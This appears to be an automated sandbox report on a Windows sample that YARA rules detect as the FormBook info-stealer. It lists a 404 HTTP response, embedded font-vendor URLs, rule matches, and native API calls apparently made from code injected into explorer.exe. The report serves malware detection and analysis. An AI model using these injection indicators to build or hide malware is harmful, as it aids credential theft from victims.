          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Jan 2021 19:59:51 GMTContent-Type: text/htmlContent-Length: 505Connection: closeETag: "5f98d73b-1f9"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419D5A NtCreateFile,1_2_00419D5A
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,1_2_00419F3A
          Source: C:\Windows\explorer.exeCode function: 2_2_074BBA32 NtCreateFile,2_2_074BBA32
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9540 NtReadFile,LdrInitializeThunk,7_2_055C9540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C95D0 NtClose,LdrInitializeThunk,7_2_055C95D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9710 NtQueryInformationToken,LdrInitializeThunk,7_2_055C9710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9FE0 NtCreateMutant,LdrInitializeThunk,7_2_055C9FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9780 NtMapViewOfSection,LdrInitializeThunk,7_2_055C9780
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9650 NtQueryValueKey,LdrInitializeThunk,7_2_055C9650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_055C9660
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C96D0 NtCreateKey,LdrInitializeThunk,7_2_055C96D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_055C96E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_055C9910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C99A0 NtCreateSection,LdrInitializeThunk,7_2_055C99A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9840 NtDelayExecution,LdrInitializeThunk,7_2_055C9840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_055C9860
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A50 NtCreateFile,LdrInitializeThunk,7_2_055C9A50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9560 NtWriteFile,7_2_055C9560
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CAD30 NtSetContextThread,7_2_055CAD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9520 NtWaitForSingleObject,7_2_055C9520
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C95F0 NtQueryInformationFile,7_2_055C95F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CA770 NtOpenThread,7_2_055CA770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9770 NtSetInformationFile,7_2_055C9770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9760 NtOpenProcess,7_2_055C9760
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CA710 NtOpenProcessToken,7_2_055CA710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9730 NtQueryVirtualMemory,7_2_055C9730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C97A0 NtUnmapViewOfSection,7_2_055C97A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9670 NtQueryInformationProcess,7_2_055C9670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9610 NtEnumerateValueKey,7_2_055C9610
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9950 NtQueueApcThread,7_2_055C9950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C99D0 NtCreateProcessEx,7_2_055C99D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CB040 NtSuspendThread,7_2_055CB040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9820 NtEnumerateKey,7_2_055C9820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C98F0 NtReadVirtualMemory,7_2_055C98F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C98A0 NtWriteVirtualMemory,7_2_055C98A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9B00 NtSetValueKey,7_2_055C9B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055CA3B0 NtGetContextThread,7_2_055CA3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A10 NtQuerySection,7_2_055C9A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A00 NtProtectVirtualMemory,7_2_055C9A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A20 NtResumeThread,7_2_055C9A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C9A80 NtOpenDirectoryObject,7_2_055C9A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9D60 NtCreateFile,7_2_010B9D60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9F40 NtAllocateVirtualMemory,7_2_010B9F40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9E10 NtReadFile,7_2_010B9E10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9E90 NtClose,7_2_010B9E90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9D5A NtCreateFile,7_2_010B9D5A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9F3A NtAllocateVirtualMemory,7_2_010B9F3A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B9E8A NtClose,7_2_010B9E8A
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E97E80_2_057E97E8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E4E080_2_057E4E08
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E94E80_2_057E94E8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E47770_2_057E4777
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057ED7F80_2_057ED7F8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057ED7E70_2_057ED7E7
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E97D80_2_057E97D8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E00070_2_057E0007
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EF2A10_2_057EF2A1
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EAD480_2_057EAD48
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EAD3F0_2_057EAD3F
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057E4DF90_2_057E4DF9
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EAFF80_2_057EAFF8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D9F81_2_0041D9F8
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041E2651_2_0041E265
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041DABE1_2_0041DABE
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D3B51_2_0041D3B5
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041DC0A1_2_0041DC0A
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D4241_2_0041D424
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041DD641_2_0041DD64
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041E5DF1_2_0041E5DF
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041E5E21_2_0041E5E2
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D5FF1_2_0041D5FF
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00409E3B1_2_00409E3B
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D7201_2_0041D720
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041D7D41_2_0041D7D4
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041DFFC1_2_0041DFFC
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CFA61_2_0041CFA6
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\explorer.exeCode function: 2_2_074BBA322_2_074BBA32
          Source: C:\Windows\explorer.exeCode function: 2_2_074BEB0E2_2_074BEB0E
          Source: C:\Windows\explorer.exeCode function: 2_2_074B6B1F2_2_074B6B1F
          Source: C:\Windows\explorer.exeCode function: 2_2_074B6B222_2_074B6B22
          Source: C:\Windows\explorer.exeCode function: 2_2_074B91322_2_074B9132
          Source: C:\Windows\explorer.exeCode function: 2_2_074B20692_2_074B2069
          Source: C:\Windows\explorer.exeCode function: 2_2_074BEA6F2_2_074BEA6F
          Source: C:\Windows\explorer.exeCode function: 2_2_074BA8622_2_074BA862
          Source: C:\Windows\explorer.exeCode function: 2_2_074B20722_2_074B2072
          Source: C:\Windows\explorer.exeCode function: 2_2_074B3CEC2_2_074B3CEC
          Source: C:\Windows\explorer.exeCode function: 2_2_074B3CF22_2_074B3CF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05651D557_2_05651D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05652D077_2_05652D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05580D207_2_05580D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056525DD7_2_056525DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559D5E07_2_0559D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B25817_2_055B2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05642D827_2_05642D82
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564D4667_2_0564D466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB4777_2_055AB477
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559841F7_2_0559841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056444967_2_05644496
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05651FF17_2_05651FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565DFCE7_2_0565DFCE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A6E307_2_055A6E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564D6167_2_0564D616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05652EF77_2_05652EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558F9007_2_0558F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A41207_2_055A4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A99BF7_2_055A99BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0565E8247_2_0565E824
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056410027_2_05641002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA8307_2_055AA830
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056528EC7_2_056528EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559B0907_2_0559B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056520A87_2_056520A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B20A07_2_055B20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AAB407_2_055AAB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0562CB4F7_2_0562CB4F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05652B287_2_05652B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AA3097_2_055AA309
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056323E37_2_056323E3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BABD87_2_055BABD8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564DBD27_2_0564DBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056403DA7_2_056403DA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B138B7_2_055B138B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BEBB07_2_055BEBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0563FA2B7_2_0563FA2B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AB2367_2_055AB236
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05644AEF7_2_05644AEF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056522AE7_2_056522AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BD9F87_2_010BD9F8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BE2657_2_010BE265
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BDABE7_2_010BDABE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BDD647_2_010BDD64
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A2D877_2_010A2D87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A2D907_2_010A2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BE5DF7_2_010BE5DF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BE5E27_2_010BE5E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BDC0A7_2_010BDC0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BD4207_2_010BD420
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCFA67_2_010BCFA6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BD7BE7_2_010BD7BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A2FB07_2_010A2FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BDFFC7_2_010BDFFC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A9E3B7_2_010A9E3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A9E407_2_010A9E40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0558B150 appears 136 times
          Source: zHgm9k7WYU.exeBinary or memory string: OriginalFilename vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000000.228278188.00000000005B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
